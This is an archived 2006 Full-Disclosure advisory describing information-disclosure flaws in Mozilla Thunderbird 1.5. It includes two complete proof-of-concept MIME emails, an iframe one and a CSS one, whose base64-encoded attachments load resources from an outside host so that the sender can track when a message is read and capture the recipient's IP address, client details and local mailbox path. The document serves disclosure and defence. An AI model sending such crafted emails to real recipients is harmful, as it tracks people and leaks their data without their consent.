Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure

from [Renaud Lifchitz] Network Security [Permanent Link]
Subject: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
Date: Tue, 28 Feb 2006 19:59:32 +0100 
Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities


//----- Advisory


Program          : Mozilla Thunderbird
Homepage         : http://www.mozilla.com/thunderbird/
Tested version   : 1.5
Found by         : crashfr at sysdream dot com
This advisory    : crashfr at sysdream dot com
Discovery date   : 2006/02/18


//----- Application description


Full-Featured Email

Simple to use, powerful, and customizable, Thunderbird is a full-featured
email application. Thunderbird supports IMAP and POP mail protocols, as well
as HTML mail formatting. Easily import your existing email accounts and
messages. Built-in RSS capabilities, powerful quick search, spell check
as you
type, global inbox, deleting attachments and advanced message filtering
round
out Thunderbird's modern feature set.


//----- Description of vulnerability


Thunderbird's HTML rendering engine insufficiently filters the loading
of external resources from inline HTML attachments. External files are
downloaded even if the "Block loading of remote images in mail messages"
option is enabled.


//----- Proof Of Concept


* Iframe Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
</head><body style="margin: 0px; padding: 0px; border: 0px;">
<iframe src="cid:257481cab71f$562e86af@sysdream.com"; width="100%"
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/html; name="basic.html"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==

------=_NextPart_000_0000_DE61E470.78F38016--


* CSS Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
<link rel="stylesheet" type="text/css"
href="cid:257481cab71f$562e86af@sysdream.com"; /></head><body>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/css; name="basic.css"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==

------=_NextPart_000_0000_DE61E470.78F38016--



//----- Impact


Successful exploitation may lead to information disclosure (user agent:
application version & platform, IP address...). A spammer can easily
check if an email is read. Moreover, an HTML reply to those types of
emails will contain the complete url path to the mailbox
(ie: mailbox:///C%7C/Documents%20and%20Settings/CrashFr/
Application%20Data/Thunderbird/Profiles/7jko3in9.default/
Mail/Local%20Folders/Inbox?number=2194930&amp;header=quotebody&amp;part=1.2&amp;filename=basic.css").


//----- Solution


No known solution. You have to wait for a vendor upgrade.


//----- Credits


http://www.sysdream.com
crashfr at sysdream dot com


//----- Greetings


nono2357 & the hackademy ...


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-disclosure] Question about Mac OS X 10.4 Security, Paul Schmehl
Next by Date:  [Full-disclosure] Re: Google + Amazon fun scam, Dave Korn
Previous by Thread:  Re: [Full-disclosure] reduction of brute force log, Bob Radvanovsky
Next by Thread:  Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities, Daniel Veditz
Indexes:  [Date] [Thread] [Top] [All Lists]